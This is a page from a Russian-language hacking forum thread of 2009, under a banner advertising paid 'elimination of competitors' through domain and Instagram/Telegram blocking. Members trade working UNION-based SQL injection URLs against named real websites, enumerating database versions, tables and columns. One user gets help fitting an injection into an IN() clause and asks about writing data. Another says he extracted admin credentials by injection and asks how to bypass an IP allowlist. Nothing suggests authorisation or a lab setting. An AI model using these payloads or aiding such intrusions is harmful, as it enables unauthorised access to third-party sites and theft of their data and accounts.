УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 712 из 1393

712

Опции темы

Поиск в этой теме

Опции просмотра

#7111

12.05.2009, 22:45

S00pY

Познающий

Регистрация: 24.04.2007

Сообщений: 92

Провел на форуме:
2621544

Репутация: 412

Отправить сообщение для S00pY с помощью ICQ

мануал почитать хотябы((

#7112

12.05.2009, 22:49

bug1z

Познающий

Регистрация: 07.05.2009

Сообщений: 64

Провел на форуме:
418218

Репутация: 59

2M1ks

Код:

http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11--+

Код:

http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11+from+information_schema.tables--+

Код:

http://rcc-penza.ru/content.php?action=forum&sub=viewtopic&sid=-1+union+select+1,2,3,4,5,6,7,8,column_name,10,11+from+information_schema.columns+where+table_name=0x666f72756d--+

Но в бд акаунтов вроде как нет...
Там походу на админку (http://rcc-penza.ru/admin) установлен .htaccess на доступ по ипу.

2S00pY
Я б ему не мануалы посоветовал почитать, а хотябы поверхносно изучить БД

А потом уже мануаль по скулям )

Последний раз редактировалось bug1z; 12.05.2009 в 22:57..

#7113

13.05.2009, 00:46

dllerk

Новичок

Регистрация: 01.04.2009

Сообщений: 21

Провел на форуме:
56068

Репутация: 0

Посмотрите пожалуста , здесь можно что то сделать :? http://www.melaniec.ru/news/print.php?id=9-

#7114

13.05.2009, 10:27

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Цитата:

Сообщение от dllerk

Посмотрите пожалуста , здесь можно что то сделать :? http://www.melaniec.ru/news/print.php?id=9-

Читаем вопрос №1.

http://forum.antichat.ru/thread104591.html

#7115

13.05.2009, 11:06

Deep-Ocean

Новичок

Регистрация: 12.05.2009

Сообщений: 2

Провел на форуме:
11834

Репутация: 0

Доброго времени суток.
Помогите с SQL инъекцией.
по нормальному работает такой запрос:
SELECT
*
FROM products as p,
products_description as pd
WHERE p.products_id IN (1) and
p.products_id = pd.products_id
and pd.language_id = '1'
and p.products_status=1 order by pd.products_name limit 5

при определенном запросе можно влезть в IN ( ... )

например site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+IN(1

получим
SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) union select 1,2,DATABASE(),4,5,6 IN(1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5

ну и
MYSQL ERROR REPORT
- 13/05/2009 11:05:58
---------------------------------------
1109 - Unknown table 'p' in field list

Я не очень в SQL, потому не получается у меня состряпать что-то полезное))

Спасибо.

#7116

13.05.2009, 11:18

laedafess

Познающий

Регистрация: 11.02.2009

Сообщений: 98

Провел на форуме:
1446969

Репутация: 169

попробуй делать

Код:

site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/*

или в конце +-- или %23
или

Код:

site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1

Ну и естественно там не обязательно 6 столбцов.

#7117

13.05.2009, 11:53

Deep-Ocean

Новичок

Регистрация: 12.05.2009

Сообщений: 2

Провел на форуме:
11834

Репутация: 0

Цитата:

Сообщение от laedafess

попробуй делать

Код:

site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6/*

или в конце +-- или %23

это не работает...

Цитата:

Сообщение от laedafess

или

Код:

site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+from+products as p, products_description as pd WHERE p.products_id+IN(1

Ну и естественно там не обязательно 6 столбцов.

ну да, там получается 44 столбца и

Код:

site/compare.php?cPath=&products[]=1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,DATABASE(),37,38,39,40,41,42,43,44+from+products as p, products_description as pd WHERE p.products_id+IN(1

работает отлично.... только вот ешё вопрос:
можно ли сделать UPDATE, INSERT ? и как?

#7118

13.05.2009, 12:02

laedafess

Познающий

Регистрация: 11.02.2009

Сообщений: 98

Провел на форуме:
1446969

Репутация: 169

Ну если ты получишь полноценный доступ к бд, то можно(правда не всегда). А через sql inj нельзя.

#7119

13.05.2009, 15:11

~~Krist_ALL~~

Banned

Регистрация: 14.01.2009

Сообщений: 515

Провел на форуме:
1996429

Репутация: 468

Отправить сообщение для Krist_ALL с помощью ICQ

У меня вот какой вопрос. я через sql enjection нашел в бд логин и пас к админке. и еще есть таблица admin_ip в ней 15 айпи. когдла я пытаюсь зайти в админку то пишет доступ запрещен. Видимо проходит проверка на ип. если мой ип совпадает с одним ип из таблицы админ_ип то меня допускают к вводу пароля. как это обойти - проверку по ип?